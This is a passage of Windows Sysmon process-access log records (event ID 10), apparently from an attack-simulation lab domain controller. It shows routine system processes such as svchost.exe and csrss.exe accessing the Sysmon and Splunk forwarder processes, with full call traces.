{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7A-5F25-0000-001038160400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7A-5F25-0000-001038160400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 